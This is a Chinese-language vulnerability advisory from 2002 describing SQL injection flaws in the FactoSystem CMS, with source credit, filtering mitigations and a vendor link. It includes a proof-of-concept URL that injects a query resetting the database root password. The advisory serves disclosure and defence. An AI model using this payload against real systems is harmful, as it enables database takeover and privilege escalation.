发布日期：2002-08-30
更新日期：2002-09-03

受影响系统：

FactoSystem CMS

描述：

---

FactoSystem CMS是一款WEB内容管理系统，结合IIS WEB服务器使用。

FactoSystem CMS对用户输入缺少正确过滤，远程攻击者可以利用这个漏洞进行SQL注入攻击。

FactoSystem内容管理系统(Content Management System)允许攻击者插入SQL命令到SQL查询中。FactoSystem CMS包含的author.asp、discuss.asp、holdcomment.asp脚本对用户提交的"authornumber"、"discussblurbid"、"name/email"变量的数据缺少正确过滤，攻击者可以提交恶意SQL命令而导致更改程序中SQL的查询，可进行数据库操作、更改、信息泄露和权限提升等攻击。

<*来源：Matthew Murphy （mattmurphy@kc.rr.com）
  
  链接：http://marc.theaimsgroup.com/?l=bugtraq&m=103081663719066&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Matthew Murphy （mattmurphy@kc.rr.com）提供了如下测试方法：

http://localhost/author.asp?authornumber=1%28%20And%20AuthorTable%2EAuthorID%3DBlurbTable%2EAuthorID%20And%20BlurbTable%2ESub_id%3DSubjectTable%2ESub_id%20Order%20By%20BlurbTable%2EBlurbdate%20desc%2C%20blurbtable%2Eblurbtime%20desc%3BUPDATE%20user%20SET%20Password%3DPASSWORD%28%27password%27%29%20WHERE%20user%3D%27root%27%3B%20FLUSH%20PRIVILEGES%3B--

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 对用户输入内容进行过滤（' , " -- # %09 %20）。
* 对用户输入长度进行限制。

厂商补丁：

FactoSystem
-----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://sourceforge.net/projects/facto/

浏览次数：2719
严重程度：0（网友投票）